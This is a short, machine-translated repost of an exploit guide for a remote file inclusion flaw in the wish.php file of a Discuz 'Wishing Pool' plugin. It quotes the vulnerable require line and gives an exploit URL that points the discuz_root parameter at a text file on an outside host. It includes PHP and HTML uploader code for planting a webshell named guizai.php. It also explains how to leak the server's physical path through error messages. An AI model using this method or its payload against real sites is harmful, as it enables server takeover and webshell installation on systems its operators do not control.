Discuz wishing Pool plug-in remote include vulnerability _ security related
Source: Internet
Author: User
The problem with the wish.php file for the Wishing Pool plugin:
Require $discuz _root. " /include/discuzcode.func.php ';
Manual use Method:
Remote include vulnerability, variable discuz_root filtering is not strict, the use of methods:
Http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
Not necessarily have to txt suffix, you can change to any suffix, the following must remember to add a question mark.
Here Xxxx.txt use the Cn.tink pony to write a shell to go in:
<?copy ($_files[myfile][tmp_name], "C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");? >
<form enctype= "Multipart/form-data" action= "" method= "POST" >
<input name= "MyFile" type= "File" >
<input value= "submitted" type= "Submit" >
</form>
Site physical path can be submitted http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt, look at the error message, and then modify the path in Xxxx.txt. Guizai.php is the name of the shell you uploaded.
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.